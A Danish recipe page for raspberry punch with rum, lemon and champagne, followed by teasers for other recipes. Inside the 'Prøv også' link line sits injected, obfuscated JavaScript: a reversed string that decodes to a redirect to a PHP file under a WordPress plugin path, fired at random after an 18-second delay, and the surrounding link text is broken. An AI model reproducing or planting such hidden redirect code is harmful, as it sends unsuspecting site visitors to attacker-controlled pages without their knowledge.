Hindbærpunch

Hindbær har en formidabel sød og let syrlig smag, som gør dem til et yderst velegnet bær til drinks som denne, der balancerer mellem det søde og det kraftige. Den er smagt til med masser af bobler og kan måske ligefrem snige sig ind ved midnatstid nytårsaften eller ved enhver anden festlig lejlighed!

Opskrift til 4-6 pers.

4 dl hindbærsaft, fortyndet
2 dl lys rom
1 citron, saften af
Isterninger
3 dl hindbær, frosne
½ fl champagne eller andre bobler, eller gerne lidt mere

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard&_thumbnail_id=4288&preview=true”>Hvid bowle med riesling og druer

Bland hindbærsaft, lys rom og citronsaft sammen. Hæld isterninger og hindbær i en kande eller bowle. Hæld hindbær- og romblandingen over. Top op med champagne, og server med det samme.

TIP. Frys evt. nogle af hindbærrene ned i isterningebakker med vand, og brug dem som isterninger. Det giver en flot effekt.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere